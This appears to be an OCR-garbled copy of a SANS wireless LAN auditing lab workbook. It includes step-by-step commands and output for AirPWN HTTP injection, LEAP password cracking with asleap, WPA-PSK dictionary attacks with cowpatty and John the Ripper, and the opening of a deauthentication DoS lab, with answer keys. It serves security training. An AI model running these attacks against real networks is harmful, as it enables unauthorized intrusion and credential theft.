Welcome to Scribd!
Academic Documents
Professional Documents
Culture Documents
Hobbies & Crafts Documents
Personal Growth Documents
617 Workbook Wireless Networks PDF
AI-enhanced title
‘We can see the response file contains an HTTP response message with simple HTML. content. Of course, this could be any content the attacker desired, 7.1.5. [ATTACKER] Introduction to AirPWN Next, run the AitPWN command with no command-line parameters to identify a list of available options, as shown below: 4 ./aizpwn usage: airpwa ~i -c -d -t [options) : interface to listen on {must be in monitor mode) : configuration file : supported wireless driver name : IP address of host you are targeting eional arguments: -C : channel number to snifé/inject on ~1 : log verbose data to a file -f : bpf filter for Libpcap ch: get help (this stuff) -v i increase verbosity (can be used multiple times) Supported drivers are: wlan-ng hostap airjack prism54 madwifiold madwifing rt18180 rt2500 rt2570 ? NOTE: If you are getting a "permission denied" error when running the airpwn, command, ensure you have specified the leading dot-slash ("/airpwn") as shown in the example above. Before using Airpwn, we need to modify the link type of the SWAT kit wireless card. With the HostAP drivers, the default link type in monitor mode is to include PrismAVS header information for RSSI reporting and other statistics. Airpwn does not support this header type, so it is necessary to change the link type to the standard 802.11 header with the iwpriv command, as shown: 4 Awpriv wlan0 monitor_type 0 # ‘The criti as follows: command-line options we are going to use for the injection attack are detailedCommand Argument (if any) Description option i wand Interface name to use for transmitting packets 6 Channel the victim is operating on -d wlanng Driver name used for wlan0 interface *t IP address of victim “c configreet_html Configuration file ‘Substitute the IP address in “" with the information collected from the victim station. Substitute the channel number in "" with the information collected from the victim station. Implementing the injection attack is straightforward. Simple run the AirPWN command with the appropriate arguments, as shown below: ¥ airpwn -i wlanO -C -d wlanng -t -c conf/greet_html. airpwn - modified for SANS SBC617 lab Listening for packets At this point, the attacker is positioned to manipulate the contents of any HTTP GET requests that originate from the specified IP address. 7.4.6. [VICTIM] Browse to an unencrypted website Return to the victim station and browse to any unencrypted website to generate the HTTP GET request that the attacker is configured to identify. Instead of the desired website content, you should receive the content from the attacker's response file. 7.1.7. [ATTACKER] Stop the client attack Return to the attacker's session and stop the injection attack by pressing "CTRL/C". This will cause AirPWN to stop gracefully, returning to the shel! prompt. 7.1.8. [VICTIM] Refresh website After the attacker stops the injection attack, the victim station should return to normal connectivity. Refreshing the target website should produce the appropriate results.If your system returns an error indicating “ioctI(): Device or resource is busy", it will be necessary to physically eject and reinsert your wireless card, Additional Exercise If you have extra time after completing this lab with your partner, modify the response file to supply your own message to the victim. Be creative, but polite. © Ry i ecto a > [oc I sys! ek hl ay deve Aegon"? ant oll. coThis page intentionally left blank.Lab 8 - Auditing LEAP Networks Complete the exercises in this lab to reinforce the material covered in the Auditing LEAP Networks module. To complete these exercises, you will need the lab files includes on the SANS Wireless LAN Auditing Lab CD,Lab 8-1: Examining LEAP Networks Purpose: Introduce the techniques used to identify LEAP networks from a supplied capture file. Description: In this lab we'll use a supplied capture file with mixed networks and extract, traffic that uniquely identifies the use of the Cisco LEAP protocol. 8.1.1, Identify LEAP Traffic Using the supplied capture file, identify all EAP traffic that uses the LEAP protocol. Start the Wireshark sniffer by clicking "K Run Command..." to open the Run ‘Command dialog box. Enter "wireshark" in the command text-box, then click the Run button. Open the capture file for this lab by clicking "File -> Open", navigate to the /tmp/labS folder and select the "labStraffic.dump" capture file. Next, apply 2 display filter that will display only LEAP traffic. (Hint: Use the display fields in a packet marked as LEAP) (Hint: Select frame 211 fora sample LEAP packet) (Hint: Use the "type" field in the Extensible Authentication Protocol header) (Hint: The assigned EAP type for LEAP is 17 or hexadecimal Ox! 1) (Hint: "eap.type eq 17") (Hint: The display filter should return 38 packets) Note that this display filter identifies only traffic that includes LEAP data, and docs not include the start, stop, success or failure messages. We can apply a less-specific display filter that includes LEAP and other EAP-related traffic. Remove the previous display filter, replacing it with "eapol” to display all EAP traffic, regardless of EAP type. Question: How many packets are returned from this new filter? Question: What additional information is included in this packet display’?8.1.2, Examining the LEAP Five-Way Handshake ‘The five-way LEAP handshake defines how a station authenticates to an access point, and the access point mutually authenticates to the station. Let's take a look at this process. Apply the following filter to limit the display to the initial five-way handshake in the labStraffic.dump" capture file: eapol and frame.number > 210 and frame.number < 222" Examine the frames in this exchange and answer the questions below. Question: What is the MAC address of the access point? Question: What is the MAC address of the station? Question: What is the username of the authenticating user? Select frame 211, expanding the "Extensible Authentication Protocol" protocol dissector information. The field labeled "Peer Challenge" is the 8-byte challenge from the access point to the authentication station. Selecting frame 213, we can see that Wireshark has identified another value as the "Peer Challenge". Question: What is wrong with the "Peer Challenge" in frame 213? Frame 213 represents the response from the client station to the 8-byte challenge value. Note that Wireshark does not properly identify this frame, labeling it as "Peer Challenge" when it is more appropriately labeled "Peer Response". This field is also incorrectly identified as 8 bytes in length ("Peer Challenge [8]") when the contents of the field i bytes in length, as indicated by the "Count" field, 24 ‘The next frame in the five-way handshake is the success message from the AP, indicating that the authentication station's response to the challenge text was correct. Examine the last two frames in the five-way handshake and answer the questions that follow. Close Wireshark after finishing this step. Question: How does the client correctly identify the identity of the access point in the last 2 frames of the five-way handshake?Lab 8-2: Recover Passwords with Asleap Purpose: Introduce the use of Asleap as a mechanism to audit the security of Cisco LEAP networks. Description: In this lab we'll use the Asleap tool to mount a dictionary attack against the supplied Cisco LEAP transactions, potentially revealing the usernames and passwords of legitimate users. Weaknesses in the challenge/response mechanism plague many LEAP implementations, offering an easy target for an attacker. An auditor can use Asleap to identify vulnerable LEAP implementations that can be abused by an attacker. ‘As we saw in the course material, Asleap consists of two components: the "genkeys" tool which creates the database of NTLM hashes and passwords and the "asleap" tool which examines the LEAP five-way handshake and uses the genkeys database to identify weak user passwords. 8.2.1. Generate a NTLM Hash Database In this step, we'll use the genkeys tool and the supplied dictionary file to generate the database file and corresponding index file to supply to the asleap tool. First, open an XTerm window and change to the /tmp/lab8 folder, as shown below. fed /tmp/1abe # pwd /emp/1ab8 Run the genkeys command with no arguments to see a list of command-line options, as shown below. # genkeys Genkeys 1.4.2 - generates lookup file for asleap. genkeys: Must supply ~r ~£ and =n Usage! genkeys [options] -r Input dictionary file, one word per line -£ Output pass#hash filename -n Output index filename oh Last 2 hash bytes to filter with (optional)\Using the supplied wordlist file "words" in the lab8 directory, generate the database files to use with asleap, as shown below. Note that this example was generated on a Pentium 4.2.8 GHz system. # genkeys -r words -£ words.dat -n words. idx genkeys 1.4.2 - generates lookup file for asleap. Generating hashes for passwords (this may take some time) ...Done. 135426 hashes written in 0.60 seconds: 225487.15 hashes/second Starting sort (be patient) ...Done. Completed sort in 1055547 compares Creating index file (almost finished) ...Done. 41s -1 words.* ery-re-r 1 root root. 3813222 2005-04-21 13:53 words.dat are 1 root root 1030086 2005-04-21 13:53 words. idx ? Question: How many hashes/second was your system able to generate? After generating the database and index files with genkeys, we can proceed to auditing the LEAP challenge/response exchange for weak passwords with asleap. 8.2.2. Identify Weak Passwords In this step, we'll assess the supplied packet capture files for weak passwords, First, run the "asleap" tool with no arguments to see a list of available command-line options, as shown below. # asieap asleap 1.4.2 - actively recover LEAP/PPTP passwords. asleap: Must supply an interface with ~! Usage: asleap [options] 1, 0 a stored file with -r Read from a libpcap file Interface to capture on -£ Dictionary file with NT hashes “0 Index file for NT hashes mw Write the LEAP exchange to a libpcap file -s Skip the check to make sure authentication was successful ma Perform an active attack (faster, requires AirJack drivers) 8-5=e Specify a channel (defaults to current) -0 Perform channel hopping mt Specify a timeout watching for LEAP exchange (default 5 seconds) 2D List available devices for live capture mh Output this help information and exit vw Print verbose information (more -v for more verbosity) wv Print program version and exit a ASCII dictionary file (special purpose} ‘We can see from the usage options that we can read the LEAP transaction information form a libpcap file with the "-r" option, specifying the genkeys database file with "-f" and the genkeys index file with "-n' Use asleap to assess the LEAP transaction stored in the "leapexch! dump" capture file with the genkeys files created in the previous step, as shown below: # asleap -r leapexchi.dump -f words.dat -n words.idx asleap 1.4.2 ~ actively recover LEAP/PPTP passwords. Using the passive attack method Captured LEAP exchange information: vsernamé atrager challenge £92£ 966625097069 response: 98c9fbAsebd6c£3596ad605eTbAcdi 80941 6aR4L050248L4 hash bytes: 586c NT hash: 8846 £7eaaeBfb117ad06bdd830b7586C passwort pasword Closing peap + Question: Was asleap able to recover the username and password included in the leapexch!.dump LEAP transaction? Question: What was the password reported by asleap? Question: Does the calculated last 2 bytes of the NTLM hash displayed on the " bytes:” line of the asleap output match the last two bytes of the actual user password hash? Next, assess the contents of the LEAP transaction file stored in the “leapexch2.dump" capture file, as shown below:# asleap ~r leapexch?.dump -f words.dat -n words. idx asleap 1.4.2 - actively recover LEAP/PPTP passwords. Using the passive attack method. Closing pean ... ? In this case, the asleap tool did not attempt to recover the password from the LEAP transaction supplied in the capture file. We can increase the verbosity of information reported by asleap by adding the "-v" parameter, as shown below: # asleap -r leapexch?.dump -f words.dat -n words.idx -v asleap 1.4.2 - actively recover LEAP/PPTP passwords. Using the passive attack method. Captured LEAP challenge: 0802 7500 000a 8247 d253 0040 9658 2058 ..u....G.8.8.x X 0040 9658 2058 90c8 asaa 0300 0000 B86e .8.x x. 0100 0017 Oler a017 1101 0008 1671 Sdc2 .... cbs e73£ 6174 7261 6765 T2ff EFEE FE 1... 2atrager. Captured LEAP 0801 3201 0040 9658 2058 000a 847 d253, 0040 9658 2058 c091 aaaa 0300 0058 Babe 0100 0027 02ef 0027 1101 0018 Sbf4 fdc2 Jdfd 4a0a 96d3 3c23 e762 Gaza 3523 6295 6174 7261 6765 72£f FFEE FE Using the passive attack method. Captured LEAP exchange information: username OFS\jnovak challenge: £622£5c4b0115c27 response 322039638c506a67a65c80316a346e7£598560046127£607 hash bytes: be5b Could not find a matching NT hash. Try expanding your passw list I've given up. Sorry it didn't work out. Closing peap t Question: What can we deduce about the authentication architecture of the network from the username in the leapexci3.dump capture? Question: What prevented asieap from discovering the password in this file? In this exaniple, asleap was unable to identify the password for the user "DOFS\jnovak". This is because the password for this user was not present in the input dictionary file supplied to the genkeys tool. We can expand the dictionary file supplied to genkeys to include more potential passwords and reassess this transaction, if desired. ‘Assess the LEAP exchange contents in the "leapexch4.dump" capture file, and answer the questions that follow. Question: Was asleap able to recover the password from the LEAP exchange in the Teapexch4.dump capture? Question: What kind of policies would be required to mitigate the recover of weak LEAP passwords? Question: How could an administrator enforce this kind of a policy?This completes our 8" lab exercise. Congratulations. ©Answers Section 8.1.1 Question; How many packets are returned from this new filter? Answer: 114 packets. Question: What additional information is included in this packet display? Answer: EAPOL start, success and key distribution frames are also displayed with the “eapol" display filter. Section 8.1.2 Question: What is the MAC address of the access point? Answer: The AP is at 00:40:96:58:20:58 Question: What is the MAC address of the station? Answer: The station MAC is 00:0a:8a:47:d2:53 Question: What is the username of the authenticating user? Answer: The username is "atrager" Question: What is wrong with the "Peer Challenge" in frame 213? Answer: The "Peer Challenge" is actually the 24-byte peer response and is not a "random value" as Wireshark indicates, Question: How does the client correctly identify the identity of the access point in the last 2 frames of the five-way handshake? Answer: The client forces the AP to pass a challenge/response authentication to ensure it is a legitimate access point and not an imposter. Section 8.2.1 ‘Question: How many hashes/second was your system able to generate? ‘Answer: This will vary depending on the performance of your system. Section 8.2.2 Question: Was asleap able to recover the username and password included in the Jeapexch] dump LEAP transaction? Answer: Yes Ques ‘Answer: "password" ion: What was the password reported by asleap? 8-10Question: Does the calculated last 2 bytes of the NTLM hash displayed on the “hash bytes:" line of the asleap output match the last two bytes of the actual user password hash? Answer: Yes, both values are 0x586c ine the information that is reported by asleap in verbose reporting mode - ics of this capture file would cause asleap to not attempt to recover the user's password? Answer: The authentication failed so Asleap does not attempt to recover the password, Question: What can we deduce about the authentication architecture of the network from the username in the leapexch3.dump capture? Answer: The authentication architecture is likely a Windows environment where "DOFS" is the Windows domain name. Question: What prevented asleap from discovering the password in this file? Answer: The user's password was not in the input dictionary file. Question: Was asleap able to recover the password from the LEAP exchange in the leapexch4.dump capture? Answer: Yes, the password is "flounder" Question: What kind of policies would be required to mitigate the recover of weak LEAP passwords? Answer: A strong password selection policy is required. Question: How could an administrator enforce this kind ofa policy? Answer: By rejecting user's password that are weak and regularly auditing password selection with tools like Asteap. 8-11This page intentionally left blank.Lab 9 - Auditing VPN/Segmented Networks Complete the exercises in this lab to reinforce the material covered in the Auditing VPN/Segmented Networks module. To complete these exercises, you will need the lab files includes on the SANS Wireless LAN Auditing Lab CD.Lab 9-1: Identifying IPSec Traffic Purpose: Introduce the techniques used to identify ISAKMP traffic from a supplied capture file Description: In this lab we'll use a supplied capture file with mixed networks and extract, traffic that identifies the presence of IPSec traffic. We'll look for the presence of the ISAKMP protocol, UDP-tunneled traffic and identify the method used for ISAKMP negotiation, 9.1.1. Connected to the Classroom Network Execute the following commands from a shell prompt to connect to the SANS- ROGUEO! network: # killall dhoped # iwconfig wlan0 essid SANS-ROGUEO1 enc off mode managed # dheped -d wland At this point, your system should be connected to the SANS-ROGUEOI network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance. 9.1.2. Assessing ISAKMP Traffic Using the “lab9capture.dump" capture file from the lab CD, we can examine sample ISAKMP traffic. Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button. Open the capture file for this lab by clicking "File > Open" navigate to the /imp/lab9 folder and select the “labStraffic.dump" capture file Next, apply a display filter that will display only ISAKMP traffic. (Hint: Use the protocol field name) (Hint: Use all lower-case letters) (Hint: The display filter should return 20 packets) (Hint: “isakmp")Select the first ISAKMP frame with the source address "172.16.0.99". This is the client system that is initiating the ISAKMP negotiation with the VPN server. Notice that Wireshark has identified this frame as "Aggressive" in the Info column. Expand the fields in the protocol dissector view and answer the following questions. Note that this file has been modified from its original form; ervors indicating invalid checksums can be safely ignored Question: What IP protocol is used for ISAKMP traffic? Question: What source port and destination port are used for ISAKMP traffic? Question: What field identifies the ISAKMP frame as "Aggressive"? Question: What is the supported enéryption mechanism for this client system in transform payload number 10?) (Hint: Expand the security association (SA) payload) (Hint: Expand the proposal payload #1) (Hint: Expand the transform payload #10) Question: What is the identified authentication mechanism in transform payload number 10? ‘Question: What is the identified hashing algorithm mechanism in transform payload number 10? Next, select the first frame with the source address "192.168.254.254", ‘This is the VPN server system that is responding to the ISAKMP negotiation request with its supported capabilities. Answer the following questions relating to the capability information of this device. Question: What is the supported encryption protocol for this VPN server? (Hint: Expand the ISAKMP payload) 7 (Hint: Expand the security association (SA) payload) (Hint: Expand the proposal payload #1) (Hint: Expand the transform payload #10) Question: What is the supported hashing algorithm for this VPN server? Question: What is the supported authentication mechanism for this VPN server? ‘As we can see from this ISAKMP exchange, we can determine several factors about the IPSec server and client systems including the supported encryption mechanisms, hashing mechanisms and authentication mechanisms. 9-3Recall from the material that Aggressive mode ISAKMP negotiation shortens the exchange to three frames but exposes identity information. Expand the identification payload information to reveal additional details about the IPSec server. Question: What is the reported protocol and port information in the identification payload? Question: What does the identification data represent? Note that the IP address identified in the identification data represents the actual IP address of the VPN server. The "192.168.254.254" IP address reflects the NAT address from a firewall protecting the VPN server but does not prevent the server from disclosing its intemal IP address. This can give the attacker additional information about the characteristics of the network that can be valuable in other attacks. Next, remove the display filler to reveal additional capture information in this trace. Scroll to the traffic that follows the ISAKMP negotiation and answer the questions that follow. Question: What LP protocol is used to encapsulate IPSec traffic following the ISAKMP negotiation? Question; What port number is used for the upper-layer traffic encapsulation protocol? ‘Question: What is the likely vendor associated with the port number used for traffic encapsulation? 9.1.3. Assessing Traffic with EtherApe EtherApe is a great example of a powerful open-source tool that has a wide vatiety of uses, From the perspective of auditing wireless networks, Etherape is useful in characterizing traffic on the network, including the ability to identify traffic patterns that can characterize the use of a VPN server for wireless network security. Note: At the time of this writing, EtherApe recognizes a limited number of network encapsulation methods. For this reason, EtherApe cannot graph the activity on the wireless network unless the station is connected to the wireless network. Future versions of this tool may support monitoring the network while in RFMON mode as wellFirst, start EtherApe by clicking "K > Backtrack > Sniffers > EtherApe". Backtrack will start EtherApe with the first interface name it recognizes which is "Io". This produces an error as shown: @ Link type not yet supported EtherApe unsupported link type error Click OK to acknowledge this error. Next, click "Capture > Interfaces > wlan0” to select the wireless card as the monitoring data source. EtherApe will immediately begin to graph the activity on the network, identifying active hosts and protocols. Since the wireless network is a shared medium, EtherApe can observe all traffic on the network and document it accordingly. The default configuration of EtherApe is to graph activity from hosts in the "instant iew", where the hosts that are currently communicating the most are indicated with thick interconnecting lines, as shown below. This doesn't provide us with a strong overall sense of the activity on the network, since the interconnecting lines only indicate the current bandwidth utilization on the network. ie ow > . re [Reading dalam wara nF moue EtherApe screen using the instant view for traffie representation 9-5We can change the behavior of EtherApe to change the size of the node to reflect accumulated traffic, Select the preferences icon on the EtherApe screen and change the "Node size variable" option to "Accum. traffic (In+Out)", as shown below. Click OK to close the preferences window. [fSesren car [Names [canine] Protocol Sct. Level Diag ree eh pero’ (ne) ‘opmost cognzad protocol, #j [ooo a Nooe sie vanable Diagram Node Timeout (ns) Accum, tate (nwouy | [60000 < Skee Mow near = Max Node Radius ©) Hide rode rams Bs croup uct pots as. Link With (a Node a iasing a ee Save vi Bonly |X cancel EtherApe preferences dialog box. Question: What characteristic of node traffic indicates a host that is transmitting and receiving a significant amount of traffic? Question: What characteristics would indicate the presence of a VPN server on the wireless network? Work with a lab partner to generate traffic on the wireless network, noting the corresponding activity in EtherApe, From an XTerm, use different tools such as ping, nmap and netcat to generate traffic. For example, working with a partner you can designate a client and a server to transfer files with netcat as shown below (initiate the server before the client). Create a 10 MB file of random data then establish a netcat server to transfer the file. root@1(root]# dd if=/dev/urandom bs=1024 count=10000 of-data 10000+0 records in 1000040 records out 10240000 bytes transferred in 5.869933 seconds (1744483 bytes/sec) root@1(root]# 1s -1 data wewer--r-- 1 root root 10249000 Sep 21 07:53 data root@l[root]# ne -1 -n -vwv -p 18000 data (OWKNOMM) [10.0.0.104) 18000 (biimenu) open sent 0, revd 10240000 oc root@1|root]# Press "CTRL/C" on the client to end the transfer once EtherApe indicates the file transfer has completed. You may need to reduce the maximum node size in the EtherApe options if there is too much traffic on the network to recognize different transactions. Repeat this procedure using different file sizes and different port numbers. Which hosts generate the greatest amount of traffic on the network? This completes our 9"" lab exercise. Congratulations. ©Answers Section 8.1.2 Question: What IP protocol is Answer; UDP Question: What source port and destination port are used for ISAKMP traffic? sed for ISAKMP traffic? Answer: Source and destination port 500 are used. Question: What field identifies the ISAKMP frame as "Aggressive"? Answer: The ISAKMP exchange type has a value of 4 indicating an aggressive mode exchange, Question: What is the supported encryption mechan payload number 10?) Answer: Triple DES-CBS mode (3DES-CBC). Question: What is the identified authentication mechanism in transform payload number 10? sm for this client system in transform Answer: XAUTHinitPreShared, or pre-shared key authentication. Question: What is the identified hashing algorithm mechanism in transform payload number 10? Answer; MDS Question: What IP protocol is used to encapsulate IPSec traffic following the ISAKMP negotiation’? Answer: UDP Question: What is the reported protocol and port information in the identification payload? Answer: Port 500 Question: What does the identification data represent? Answer: The identification data "staf?" indicates the group name that is being used for the pre-shared key authentication, Question: What port number is used for the upper-layer traffic encapsulation protocol? Answer: 10,000 for source and destination port to encapsulate traffic for NAT. Question: What is the encapsulation? Answer: Port 10,000 is commonly used for ISAKMP-NAT encapsulated traffic with Cisco equipment. ly vendor associated with the port number used for trafficLab 10 - Auditing WPA/PSK Networks ‘Complete the exercises in this lab to reinforce the material covered in the Auditing WPA/PSK Networks module, To complete these exercises, you will need the lab files includes on the SANS Wireless LAN Auditing Lab CD. 10-1Lab 10-1: Auditing WPA/PSK Networks i ntroduce the techniques used to identify and audit WPA/PSK networks. Description: In this lab we'll use a supplied capture file with mixed networks and extract traffic that identifies the presence of IPSec traffic. We'll look for the presence of the ISAKMP protocol, UDP-tunneled traffic and identify the method used for ISAKMP f negotiation. 10.1.1. Assessing WPA/PSK Traffic Using the supplied capture files on the lab CD, we can examine sample traffic from WPAVPSK networks. Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button, Open the capture file for this lab by clicking "File > Open", navigate to the /tmp/lab10 folder and select the "JablOcapture1.dump" capture file. Next, apply a display filter that will display only beacon frames. (Hint: Select the frame type/subtype field of a beacon frame) (Hint: The display filter should return 73 frames) (Hint: The display field name is “wlan. fe.type_subtype") (Hint: The type/subtype for beacon frames is "8") (Hint: "wlan.fe.type_subtype = 8") Next, select a beacon frame and expand the tagged management parameters tree. Inspect the tagged management parameters, and answer the questions that follow. Question: What is the SSID for this network? Question: What is the encryption protocol used for unicast traffic on this network? Question: What is the encryption protocol used for multicast traffic on this network? Question: What is the authentication method used for this network? By inspecting the information in beacon frames, we can identify the encry mechanism in use for WPA networks, as well as the authentication mecha 10-2have determined that this network uses TKIP and a pre-shared key (PSK) for authentication, let's inspect the information in the four-way handshake. 10.1.2. Identifying the Four-Way Handshake Using the "lab | Ocapture! dump" file, apply a filter to display only EAPOL traffic, (Hint: Clear the existing display filter to display all packets) (Hint: Look at the information displayed in the "Protocol" field for a display name) (Hint: Look at frame number 43) (Hint: The display filter should return four frames) (Hint: "eapol") After applying the display filter, select the first EAPOL frame and expand the "802.1x Authentication” protocol dissector tree, as shown below. Te eh ue @ tee foe Ga Ge BibPB* eS Berl VF SAQA tor view of 802.1x authentication data Wireshark protocel diss: 10-3The four frames displayed by Wireshark represent the four-way TKIP exchange. Inspecting the 802.1x authentication information in the first frame (frame number 43), we can see the reported nonce information Question: Is the first frame in the TKIP four-way handshake from the supplicant or the authenticator? (Hint: Inspect the frame control flags) (Hint: Is from DS or to DS set?) (Hi i: Compare the source address to the BSSID) Since the source address matches the BSSLD, we can see determine that the first frame is from the AP, initiating the four-way handshake. Note that the MIC field in the first part of the four-way handshake is al! 0's, since the AP does nat have enough information to calculate the PTK that is required to identify the MIC key to calculate the MIC of this frame. Next, select the second frame in the four-way handshake. This frame includes an additional nonce value that represents the supplicant nonce, since itis transmitted from the wireless station, Note that the MIC value is present in this frame, since the supplicant has enough information to calculate the PTK (authenticator address, supplicant address, authenticator nonce and now the supplicant nonce). Note that the "WPA Key’ field in part two of the four-way handshake includes the capability information of the client system. In case, the capability information matches what is advertised in the beacon frames (TKIP protocol, WPA-PSK for authentication). ‘This information can be helpful in troubleshooting clients that are not successfully completing the four-way handshake, due to incompatible cipher suites and authentication methods. Next, select the third frame in the four-way handshake, Now that the AP has the supplicant nonce value, it can calculate the PTK and verify the MIC value transmitted from the supplicant in part two of the four-way handshake. Between frames two and three, the AP verifies the supplicant's PMK (and by extension, the PSK) by comparing the observed MIC in part two of the four-way handshake with the calculated MIC of the same frame. Ifthe observed and calculated MIC's match, the AP issues part three of the four-way handshake, effectively informing the client station that they have suecessfully authenticated Next, select frame four of the four-way handshake. This frame acknowledges the receipt and content of the third frame, but provides little in the way of authentication since both stations have already exchange knowledge of the PTK. 10-410.1.3. Auditing the PSK ‘Now that we have examined the details of the four-way handshake and the information that is exchanged, we can take a look at the process of auditing the PSK with a dictionary attack. In this fashion, an auditor can capture traffic from WPA-PSK networks and mount an offline dictionary attack to identify weak and poorly selected PSK's. First, open two XTerm windows. In the first window, run the too! “top” to monitor the performance of your system. The output of top will took similar to the example provided below. # top top - 14:21:20 up 3:38, 1 user, load average: 0.00, 0.07, 0.06 Tasks: 27 total, 1 running, 26 sleeping, 0 stopped, 0 zombie Cpu(s): 0.08 user, 0.08 system, 0.04 nice, 100.0% idle Mem: 254608k total, 108684k used, 140924k free, 19016 buffers Swap: 987988k totel, Ok used, 997990 free, 65208 cached PID USER PR NI VIRT RES SHR S SCPU SMBM © TIMB+ COMMAND 1 root 9 0 240 240 2128 0.0 0.2 04 init 2 root B 0 0 9 08 0.0 0.0 :00 keventd 4 root 29 0 0 0 8 0.0 0.0 00 ksward 5 root 3 0° 0 9 O8 0.0 0.0 +00 bdflush 6 root 2 0 0.9 08 0.0 0.0 +00 kupdated 11 root 5 09 0 9 08 0.0 0.0 +00 kreiserfsd 64 root 9 0 $92 592 5125 0.0 0.2 +00 syslogd 67 root 9 0 443 448 3925 0.0 0.2 :01 klogd 174 root 9 0 09 9 08 0.0 0.0 +00 khubd 206 root 9 0 $12 S12 4488 0.0 9.2 0:00.00 dhcped 1682 root 9 0 520 520 4645 0.0 0.2 0:00.00 inetd 1685 root 9 0 1384 13841292 s 0.0 0.5 0:00.00 sshd 1693 root 8 0 S564 564 4965 0.0 0.2 0:00.00 crond 1696 root 9 0 2116 2108 1548S 0.0 0.8 0:00.00 sendmail In this example, we can see the processor for the system is reported as 100% idle, At the end of this exercise, press "Q" to exit top. In the second XTerm window, change to the /tmp/lab10 directory as shown below. # cd /tmp/1ab10 # pwd /tmp/1ab10 His Jabl0capturel.dump abl0capture2.dump labl0capture3.dump words # 10-5Three packet captures from WPA-PSK networks have been supplied, along with a short list of dictionary words, Run the cowpatty tool from the current directory to see a list of avail options, as shown below. # cowpatty cowpatty 4.0 - WPA-PSK dictionary attack. cowpatty: Must supply a list of passphrases in a file with -f or a hash “Elle with -d. Use "-£ -" to accept words on stdin. Usage: cowpatty [options] -f£ Dictionary file -d Hash file (genpmk) -r Packet capture file -s Network SSID (enclose in quotes if SSID includes spaces) -h Print this help information and exit -v Print verbose information (more -v for more verbosity) -V¥ Print program version and exit ‘The cowpatty tool requires at least three command-line options: a list of dictionary words, a lidpeap-formatied packet capture containing the WPA-PSK four-way handshake and the network SSID. Note that all three of these parameters are required, and that the SSID must be specified in the proper case as it is seen on the network. Using the "lablOcapture dump" capture file, mount an attack against the PSK using the supplied dictionary file, as shown below, ‘The SSID for this capture file is "SANS". ‘While this command is running, examine the performance statistics reported by "top in the other XTerm window. 4 cowpatty -r labl0capturel.dump -f words -s SANS cowpatty 4.0 - WPA-PSK dictionary attack. Collected all necessary data to mount crack against passphrase. Starting dictionary attack. Please be patient. key no. 1000: adynamia :Question: What was the result of assessing the PSK with the cowpatty tool? Question: What is the PSK reported by cowpatty? Question: How many passphrases were tested with cowpatty? Question: How long did it take to recover the passphrase? ‘Question: How many words per second was your system able to test? Question: What was the relative CPU utilization of your system when running cowpatty? Question: What could be done to reduce the amount of time needed to test all the passwords in the supplied dictionary file using this tool? Next, mount a similar attack against the "lab 1Ocapture2.dump" capture file. You'll need to determine the SSID for the network by examining the contents of a beacon frame with Wireshark. Note also that the passphrase used for this capture file is NOT present in the dictionary file. Use the hints below to identify the PSK used for this eapture fie. (Hint: You can interactively try passwords one at a time with cowpatty by specifying a hyphen as the filename, as shown below. This causes cowpatty to accept passphrases from STDIN, or keyboard input.) (Hint: The company name is GNIP GNOP) (Hint: The PSK is a derivation of the company name) (Hint: The PSK is 8 characters in length) (Hint: The PSK was selected using common techniques for selecting "strong" passwords) ") for the lette (Hint: It is common for users to substitute a one i" and a zero ("0") for the letter "o") 4 cowpatty -z labl0capture2.dump -£ - ~s GNIPGNOPWLAN cowpatty 4.0 - WPA-PSK dictionary attack. Using STDIN for words. Collected all necessary data to mount crack against passphrase. Starting dictionary attack. Please be pat. gnip gnop gnipgnop gnipgadp The third capture file uses a PSK that is based on a modification of a dictionary word. Use John the Ripper in conjunction with cowpatty and the supplied word list to identify the password as shown below. Note that this attack will take a long time - be prepared 10-7for a busy system over an extended period of time while mounting this attack (it may take several days to complete, depending on the speed of your processor) # john -rules -wordlist:words -stdout | compatty -r lebl0capture3.dump ~£ - -s GNIPGNOPWLAN a In more recent versions of coWPA\tty, support for precomputed hash tables of PM's was added. Although each hash table is specific to a single SSID, they only have to be calculated once. ‘The final capture file is a four-way capture of a WPA2-PSK network using the very common SSID "linksys". Also supplied is the hash table "linksys.hash” which includes many popular passphrases and precomputed PMK information. instead of specifying the wordlist with the "-£" parameter, we reference a hash file that was generated with the "genpmk" tool included with coWPAtty. Recover the passphrase for the capture file "wpa2psk-linksys.dump", as shown below. } cowpatty -r wpa2psk-Linksys.dump -d linksys.hash -s linkeys + Question: How much time did it take to recover the passphrase of the final capture with the precomputed PMK data? This completes our tenth lab exercise. Congratulations. © 10-8Answers Section 10.1.1 * Question: What is the SSID for this network? Answer: "SANS" Question: What is the encryption protocol used for unicast traffic on this network? Answer: TKIP Question: What is the encryption protocol used for multicast traffic on this network? Answer: TKIP Question: What is the authentication method used for this network? Answer: PSK or pre-shared keys. Question: Is the first frame in the TKIP four-way handshake from the supplicant or the authenticator? Answer: The first frame is from the AP. Section 10.1.3 Question: What was the result of assessing the PSK with the cowpatty tool? Answer: The PSK was successfully recovered Question: What is the PSK reported by cowpatty? Answer: "avocation” Question: How many passphrases were tested with cowpatty? Answer: 4459 Question: How long did it take to recover the passphrase? Answer: 105 seconds on a Pentium Celeron 2 GHz system Question: How many words per second was your system able to test? Answer: 42.49 words/second Question: What was the relative CPU utilization of your system when running cowpatty? Answer: CPU utilization should be at nearly 100% utilization for the duration of the attack. Question: What could be done to reduce the amount of time needed to test all the passwords in the supplied dictionary file using this tool? Answer: Distributing the wordlist to multiple systems or increasing the processing capacity of the system would reduce the time needed to test all the passwords. 10-9This page intentionally left blank.Lab 11 — Denial of Service Attacks Complete the exercises in this lab to reinforce the material covered in the Denial of Service Attacks on Wireless Networks module. To complete these exercises, you will need the Backtrack Security Tools Linux CD and a supported wireless card, as included, in the SWAT toolkit.Lab 11-1: Demonstrating a Denial-of-Service Attack ” Purpose: This lab will provide attack against a wireless station. \ds-on experience on demonstrating a denial-of-service Description: In this lab exercise you will use the file2air utility to implement an 802.11 deauthentication fload attack against a partner station that is connected to the SANS- ROGUEDI classroom network. It is occasionally necessary to demonstrate the effectiveness of a denial-of-service attack, either in a consulting role or to demonstrate the effectiveness of such an attack to co- workers or management. This lab will provide the means necessary to implement such an attack. Please use this information wisely; it is not wise to launch denial-of-service attacks against networks that you are not authorized to attack. In order to complete this lab, you will need to work with a partner system. One system will follow the steps marked “[VICTIM]" and will be the target of the denial-of-service attack. ‘The second system will follow the steps marked "[ATTACKER]" to mount the DoS attack. You may optionally wish to switch 